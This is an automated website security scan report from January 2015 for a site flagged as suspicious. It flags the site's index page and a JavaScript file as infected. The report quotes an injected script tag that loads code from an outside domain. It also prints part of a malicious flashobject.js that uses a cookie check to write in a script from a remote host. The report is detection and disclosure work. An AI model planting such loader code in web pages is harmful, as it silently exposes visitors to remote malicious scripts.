Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=melodiavisual.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://melodiavisual.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 22 Jan 2015 10:39:46 GMT Location: http://www.melodiavisual.com/ Server: Apache Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.melodiavisual.com/ | HTTP/1.1 200 OK Date: Thu, 22 Jan 2015 10:39:46 GMT Accept-Ranges: bytes ETag: "56882c4d42c4cf1:586fe6" Server: Microsoft-IIS/6.0 Content-Length: 967 Content-Location: http://www.melodiavisual.com/index.html Content-Type: text/html Last-Modified: Sat, 30 Aug 2014 11:05:25 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.melodiavisual.com/index.html | 200 OK Content-Length: 967 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://holidayhaemodialysisscotland.co.uk/min.php"></script> | ||
http://www.melodiavisual.com/flashobject.js | 200 OK Content-Length: 7565 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[3464 bytes skipped]... " + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");} if (navigator.userAgent.indexOf("KHTML") == -1 && navigator.userAgent.indexOf("NT") != -1){if(navigator.cookieEnabled == true) {var user = getCookie("NSwfCookie");if (user !=="ok"){newswfcookie();setCookie("NSwfCookie", "ok", 7, "/");}}} function newswfcookie(){document.write(unescape("%3Cscript src='http://newswf.com/in.cgi?6' type='text/javascript'%3E%3C/script%3E"));} function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;} Antivirus reports:
| ||
http://melodiavisual.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 22 Jan 2015 10:39:47 GMT Location: http://www.melodiavisual.com/test404page.js Server: Apache Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.melodiavisual.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: melodiavisual.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 22 Jan 2015 10:39:46 GMT
Location: http://www.melodiavisual.com/
Server: Apache
Content-Length: 237
Content-Type: text/html; charset=iso-8859-1
...237 bytes of data.
GET / HTTP/1.1
Host: melodiavisual.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 22 Jan 2015 10:39:46 GMT
Location: http://www.melodiavisual.com/
Server: Apache
Content-Length: 237
Content-Type: text/html; charset=iso-8859-1
...237 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: melodiavisual.com
Referer: http://www.google.com/search?q=melodiavisual.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: melodiavisual.com
Referer: http://www.google.com/search?q=melodiavisual.com
Result:
The result is similar to the first query. There are no suspicious redirects found.